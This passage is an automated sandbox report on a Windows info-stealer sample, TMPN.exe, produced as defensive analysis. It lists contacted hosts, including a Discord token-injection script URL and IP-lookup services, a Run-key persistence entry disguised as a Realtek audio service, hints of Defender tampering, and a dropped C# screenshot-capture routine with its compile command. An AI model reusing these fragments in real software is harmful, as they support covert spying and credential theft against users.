https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	TMPN.exe, 00000000.00000002.4597960184.0000028D6F587000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000D.00000002.2263957756.00000276A6F28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626	TMPN.exe, SecurityHealthSystray.exe.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 0000000D.00000002.2263957756.00000276A6D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2281611258.0000021464FB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.githubusercontent.com/u/145487845?v=4sqlite:	TMPN.exe, SecurityHealthSystray.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s	TMPN.exe, SecurityHealthSystray.exe.0.dr	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.v	powershell.exe, 00000010.00000002.2372692651.000002147CFBC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/	TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000010.00000002.2281611258.0000021466715000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.de/	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.baidu.com/	TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
162.159.128.233	ptb.discord.com	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1503182
Start date and time:	2024-09-03 04:17:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TMPN.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.expl.evad.winEXE@38/24@4/3
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecurityHealthSystray.exe, PID 3472 because there are no executed function
Execution Graph export aborted for target SecurityHealthSystray.exe, PID 4920 because it is empty
Execution Graph export aborted for target TMPN.exe, PID 2244 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6320 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6956 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:18:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
04:18:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
22:18:00	API Interceptor	6x Sleep call for process: WMIC.exe modified
22:18:04	API Interceptor	70x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	bkfaf34.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	1d0000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	ip-api.com/json/?fields=11827
	SolaraBoostrapper.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	05HbyP1HCy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	iqA8j9yGcd.exe	Get hash	malicious	HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT	Browse	ip-api.com/json/
	r7XXceHRzO.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	znwFR6hkn8.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Shipping Documents Cos090224.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DOCUMENTS.vbs	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
162.159.128.233	file.exe	Get hash	malicious	LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT	Browse	discord.com/phpMyAdmin/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	bkfaf34.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	1d0000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	SolaraBoostrapper.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	05HbyP1HCy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	iqA8j9yGcd.exe	Get hash	malicious	HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT	Browse	208.95.112.1
	r7XXceHRzO.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	znwFR6hkn8.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Shipping Documents Cos090224.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DOCUMENTS.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
ptb.discord.com	zamPeEkHWr.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.138.232
	IDLBk4XMUa.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.138.232
	golang-modules.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	golang-modules.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	SetupSpuckwars_1.15.5.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	SetupSpuckwars_1.15.5.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	KzqQe0QtRd.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	PAP46E1UkZ.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	A4AxThCBqS.exe	Get hash	malicious	Nanocore, Luna Logger, Umbral Stealer	Browse	162.159.136.232
	SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exe	Get hash	malicious	CKS Stealer, Spark RAT	Browse	162.159.137.232
api.ipify.org	Book_0256103.vbe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	05HbyP1HCy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	UXJM4UoKhk.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	tYPdrTU0ha.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	CONG TY TNHH RAISING VIETNAM - USD 5850.00pdf.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.12.205
	REMITTANCE ADVICE.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	PACIFIC ARGOSY PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SSI Brilliant - SHIP PARTICULARS.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	nitro.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	bkfaf34.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	1d0000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	SolaraBoostrapper.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	05HbyP1HCy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	iqA8j9yGcd.exe	Get hash	malicious	HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT	Browse	208.95.112.1
	r7XXceHRzO.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	znwFR6hkn8.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Shipping Documents Cos090224.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DOCUMENTS.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
CLOUDFLARENETUS	bkfaf34.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.128.233
	Book_0256103.vbe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://drivespacee.slickplan.com/pmympv0/content/svgxia03qvqu1bahbet?language=en_US	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://altanks.com.au/	Get hash	malicious	Unknown	Browse	104.26.14.92
	tjigfd64.exe	Get hash	malicious	LummaC Stealer	Browse	162.159.61.3
	https://altanks.com.au/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://altanks.com.au/	Get hash	malicious	Unknown	Browse	104.26.15.92
	Invoice INV_1266.pdf	Get hash	malicious	Unknown	Browse	188.114.97.3
	tjigfd64.exe	Get hash	malicious	LummaC Stealer	Browse	162.159.61.3
	https://xz0816.cn/	Get hash	malicious	Unknown	Browse	104.18.36.155
CLOUDFLARENETUS	bkfaf34.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.128.233
	Book_0256103.vbe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://drivespacee.slickplan.com/pmympv0/content/svgxia03qvqu1bahbet?language=en_US	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://altanks.com.au/	Get hash	malicious	Unknown	Browse	104.26.14.92
	tjigfd64.exe	Get hash	malicious	LummaC Stealer	Browse	162.159.61.3
	https://altanks.com.au/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://altanks.com.au/	Get hash	malicious	Unknown	Browse	104.26.15.92
	Invoice INV_1266.pdf	Get hash	malicious	Unknown	Browse	188.114.97.3
	tjigfd64.exe	Get hash	malicious	LummaC Stealer	Browse	162.159.61.3
	https://xz0816.cn/	Get hash	malicious	Unknown	Browse	104.18.36.155

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (610), with no line terminators
Category:	dropped
Size (bytes):	613
Entropy (8bit):	5.310346876042674
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ik/aBUWZETab:V3ka6KOkqeFk/aXETab
MD5:	B53E191A62C03C4437B568BAC7BE1639
SHA1:	0B5C32C172B0D82A5665CC3A6E403E7143BC79C1
SHA-256:	485C844C55304BD2F85A2EE4C159A6E7AC9BA1BA0020767D3063F88BB6717A5C
SHA-512:	A4A42516C2CA6FDE40091A4B7E74A8E950CACC8BC1071AE34154D8AF05A98403E8E132D4267AB5821DE90792963591C011B099D6BBB4683704FF91D376C18451
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.0.cs"

C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1573546995002197
Encrypted:	false
SSDEEP:	48:6f7oEAtf0KhzBU/hf6mtJyN0ppW1ulta3Rq:NNz0AmqOJPK
MD5:	856F181F6FE061751E25F700237FE4F4
SHA1:	F5FE3B5410140AA3C21EB86A41A52A00884D5DC0
SHA-256:	869FD609C82D42531081D9151F7CF4B257A192D5F76D4C651682D2F3ED231EB2
SHA-512:	EC836662F7C73DC13FEDAD98589EB2827C882181AF5BB826CC910259B8B470770E02410A23B94573F70A7B47970A0831CA71B30649D56053805DB6DDF4E22669
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (717), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1138
Entropy (8bit):	5.396204000435637
Encrypted:	false
SSDEEP:	24:KOaFLId3ka6KOkqeFk/aXETaaKax5DqBVKVrdFAMBJTH:+5kka6NkqeFkSXE+aK2DcVKdBJj
MD5:	C7F2F9C303E5DC1CACC1AD37282B8715
SHA1:	06AE10206CC4BCBFB0CDADCD641F59C0BB2FC448
SHA-256:	8C89AE3690DA3AD6970BB40E8823AE0D18BFC7525DFCD021D8BD8EF038B08EFD
SHA-512:	0DF92D281D472819A91FB035F7E4F477C2400F65BF8DC150D99CF076B4B46CF135BD9CF1CAD1822A1AF46BA08B905544319223EAB828B84AB97FAE81A1F6625C
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\ImU8tE4J8P> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the lates

C:\Users\user\AppData\Local\Temp\0h3tdgef\CSC17976FD43C1F4C8D908DC9F141DC89D.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0869586819452026
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycSak7Ynqq/zPN5Dlq5J:+RI+ycuZhNtakSbPNnqX
MD5:	AC1A92E8EDC70304CD0A9416E258D963
SHA1:	C4E7BC39BAD58D77E84B8B30053A6B247239609C
SHA-256:	D5F4FFB9AED95C17924F83876C9C0521CC896864AC6C4FB07307D2809B4C06FC
SHA-512:	53728C55217D1B9472C9F95DCBEC628BFE8DFD5574FB849C949FAFA471069923DE77AB018F3B3B2660160B51C2EF2B825AC03841F61519C03B5DDA06A4A1A608
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.h.3.t.d.g.e.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.h.3.t.d.g.e.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\ImU8tE4J8P\Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	479370
Entropy (8bit):	7.916145239899809
Encrypted:	false
SSDEEP:	12288:76ieFDm+FcmLeU4w9PZHg7LLt/zwcbzm6i7E8VZR:7HiDm8ftz9Pxg7Lp/zwcbzX8E8HR
MD5:	366F98FCAAD60C76EBA35859F770154D
SHA1:	F1CEACDE55863C1CD07A5EB5BDC3CDEE66CD1674
SHA-256:	C317094E3C8ADDAD7CD5B4BA350117EF2967C218A11B8E5840F232F9A4B1FEA2
SHA-512:	B5F7D7E99D4305EC3C3EE9C161776E5B1BE0DD2B443F12E8D42426364181CAA2852242B6F3259889CEA1AE001002AB9D64E6C0F60C4B9BF1F597151E5A4285A7
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....lG...f.._......}.\.1..._W..}.x.pB.{.$8..P..VBH..N..H.H@.NH.{.....".T./.....g.;..c$.....1cF......o.X..9.4Y......sG.V..y.#..I...C.k....3...W.........#S..\|_.dm..L}y...M./>R...$.......\|..y1uXL.s...>..:....Y1....P...}.0u...~...L.......&M..f..s...{[..I.......v..]....;.b....;.M..,...i.......2.>....{.s`.{nm.z.-...D..k.n..S......P.UL...=..g..L.-...[ohY...,~k...N....,zS....+,zC..._....o..P.h.X=....}.....S..z..\..W....+S..W.%..:-^u.........(-1.+.}@..+..<..=.._.:....YZ..s\|Q.k.T._._....xf..^..5..W^Z.xj.....W]..............\|n.~....}/MK^.s.....;_w.K............>....c...i..sYZ.s..v...G......z~.c.(.....zl*_...8,....d..o..E..]/(tw9..-....l..o.{........;...;.W.E.............0..{.k...%o........._.?......r^i5Vl..y...;.S`....S...3.Om.Va..g.19y..,...B.Glj...v......9.....7C.......%..}.......k..s.....x.69o.3...us....q..;..<.<.~g.SSw.3J^g..KL....bN...

C:\Users\user\AppData\Local\Temp\RESEB20.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols, created Tue Sep 3 04:05:46 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1364
Entropy (8bit):	4.028998821339635
Encrypted:	false
SSDEEP:	24:HdC9A8aVxaHkwKUaF/XNwI+ycuZhNtakSbPNnqSWd:p5aLKxJXm1ulta3RqSm
MD5:	FDC1E6A08DED1EB9C173DE9C574A5ED9
SHA1:	B82BED8C488EB02B277B8B84A8A6761DCE1F5CD9
SHA-256:	10337917755DA9297537A76060EE68CFEFAD1B7CDD0C7DD77BAAC5AC4C0DB5E6
SHA-512:	FF5BB085B4AAEF167F5ADA0B6D07216BEAC3AD08CD37CA7999E333AE200BB358F2085A36D2436AA0CD747F1701C53A24EFBB0BFE902B0FF9B6B002CDC188D20E
Malicious:	false
Preview:	L......f.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........V....c:\Users\user\AppData\Local\Temp\0h3tdgef\CSC17976FD43C1F4C8D908DC9F141DC89D.TMP..............................X.c..........7.......C:\Users\user\AppData\Local\Temp\RESEB20.tmp.-.<....................a..Microsoft (R) CVTRES.w.=..cwd.C:\Users\user\AppData\Local\Temp\ImU8tE4J8P.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.h.3.t.d.g.e.f...d.l.l.....(.....L.e.g.a.l.C.o.p.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25cyuogn.wyc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30mqm2nj.wc4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45mpw0ck.nne.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chh0ndvl.2q4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dedtyfzj.kvf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
